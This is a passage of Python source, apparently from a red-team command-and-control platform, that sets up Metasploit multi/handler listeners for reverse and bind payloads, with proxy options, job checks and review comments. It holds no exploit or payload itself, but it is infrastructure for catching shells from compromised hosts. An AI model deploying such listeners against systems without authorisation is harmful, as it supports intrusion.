                    context = data_return(302, FileSession_MSG.get(302), {})
                    return context

                if moduleresult.get("status"):
                    result = {}
                    context = data_return(203, FileSession_MSG.get(203),
                                          result)
                    return context
                else:
                    result = {
                        "data": None,
                        "reason": moduleresult.get("message")
                    }
                    context = data_return(303, FileSession_MSG.get(303),
                                          result)
                    return context
        else:
            context = data_return(306, FileSession_MSG.get(306), {})
            return context
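    def create(opts=None):
        """Create a listener (handler) from a dict of user-supplied options.

        All option keys passed on to the module must be upper-case. ``opts`` is
        mutated in place: the UI-level proxy keys are folded into a single
        ``proxies`` value, the direction-specific host key that does not apply
        to the payload is dropped, and on success ``opts['ID']`` is set to the
        new job id.

        Args:
            opts: handler options, e.g. ``{'PAYLOAD': ..., 'LHOST': ...,
                'LPORT': ..., 'RHOST': ...}``. ``VIRTUALHANDLER`` is True
                selects a virtual handler; ``proxies_proto`` /
                ``proxies_ipport`` describe an optional proxy ("Direct" or
                absent means none). ``None`` is treated as an empty dict.

        Returns:
            The ``data_return`` context: 201 on success (with ``opts``), 301
            when the handler could not be created or its job is not alive,
            500 when ``PAYLOAD`` is missing or not a string.
        """
        if opts is None:
            opts = {}

        if opts.get('VIRTUALHANDLER') is True:  # virtual handler
            opts.pop('VIRTUALHANDLER')
            result = Handler.create_virtual_handler(opts)
            if result is None:
                opts['ID'] = None
                return data_return(301, Handler_MSG.get(301), opts)
            return data_return(201, Handler_MSG.get(201), {})

        # Real handler.  Fold the two UI-level proxy keys into the single
        # 'proxies' option; the UI keys are removed either way.
        proxies_proto = opts.pop('proxies_proto', None)
        proxies_ipport = opts.pop('proxies_ipport', None)
        if proxies_proto is not None and proxies_proto != "Direct":
            opts["proxies"] = f"{proxies_proto}:{proxies_ipport}"

        payload = opts.get('PAYLOAD')
        if not isinstance(payload, str):
            # Previously this surfaced as an AttributeError caught by a broad
            # except; report the malformed input explicitly instead.
            logger.error("PAYLOAD option missing or not a string: %r", payload)
            return data_return(500, CODE_MSG.get(500), {})

        # Use substring tests rather than str.find(): find() returns -1 when
        # the needle is absent, which is truthy, so the old
        # `find("reverse_http") or find("reverse_winhttp")` test was always
        # true and the EXITONSESSION branch below was unreachable.
        if "reverse" in payload:
            # A reverse payload has no remote host to connect to.
            opts.pop('RHOST', None)
        elif "bind" in payload:
            # A bind payload has no local host to listen on.
            if opts.get('LHOST') is not None:
                opts.pop('LHOST')

        # Special handling for reverse http(s) handlers, which stay resident
        # rather than exiting on the first session.
        if "reverse_http" in payload or "reverse_winhttp" in payload:
            opts['EXITONSESSION'] = False
            # Key kept verbatim: it is a runtime option name the consumer
            # presumably matches on — do not "correct" the spelling here.
            opts['KillHandlerFouce'] = True
        else:
            opts['EXITONSESSION'] = bool(opts.get('EXITONSESSION'))
        # NOTE(review): uuid1() embeds the host's MAC address and a timestamp;
        # if nothing depends on the seed being time-ordered, uuid4() would
        # avoid leaking that — confirm with the consumer of PayloadUUIDSeed.
        opts['PayloadUUIDSeed'] = str(uuid.uuid1())

        result = MSFModule.run(module_type="exploit", mname="multi/handler",
                               opts=opts, runasjob=True)

        if not isinstance(result, dict) or result.get('job_id') is None:
            opts['ID'] = None
            return data_return(301, Handler_MSG.get(301), opts)

        try:
            job_id = int(result.get('job_id'))
        except (TypeError, ValueError) as E:
            # A non-numeric job id is a failed creation, not a crash.
            logger.error(E)
            opts['ID'] = None
            return data_return(301, Handler_MSG.get(301), opts)

        if not Job.is_msf_job_alive(job_id):
            return data_return(301, Handler_MSG.get(301), opts)

        opts['ID'] = job_id
        Notice.send_success("新建监听成功:{} {} JobID:{}".format(
            opts.get('PAYLOAD'), opts.get('LPORT'), result.get('job_id')))
        return data_return(201, Handler_MSG.get(201), opts)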